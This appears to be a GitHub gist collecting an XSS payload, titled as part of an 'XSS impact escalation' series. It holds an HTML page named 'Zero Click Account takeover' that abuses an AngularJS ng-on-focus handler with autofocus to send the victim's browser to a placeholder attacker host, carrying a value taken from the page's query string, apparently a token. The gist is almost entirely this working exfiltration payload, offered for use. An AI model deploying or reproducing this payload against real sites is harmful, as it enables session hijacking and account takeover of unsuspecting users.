Skip to content

Instantly share code, notes, and snippets.

@1dayluo

1dayluo/javascript

Created November 2, 2023 06:11
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 1dayluo/7243ac1da3e934873a67735dbfd6bd74 to your computer and use it in GitHub Desktop.
Save 1dayluo/7243ac1da3e934873a67735dbfd6bd74 to your computer and use it in GitHub Desktop.
Download ZIP
payload收集 - xss危害扩大系列
Raw
javascript
<!DOCTYPE html>
<html>
<head>
<meta charset=”utf-8" />
<title>Zero Click Account takeover</title>
<meta name=”description” content=”” />
<meta name=”viewport” content=”width=device-width” />
<base href=”/” />
<script src=”lib/socket.io.min.js”></script>
</head>
<body>
<script src=”scripts/vendor-31****a1.js”></script>
<div ng-app=”” ng-init=””>
<input ng-on-focus=”$event.view.location = ‘https://ATTACKER-URL.COM/' %2b $event.view.location.search.slice(1).split(‘%26’)[2].split(‘=’)[1]” autofocus />
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment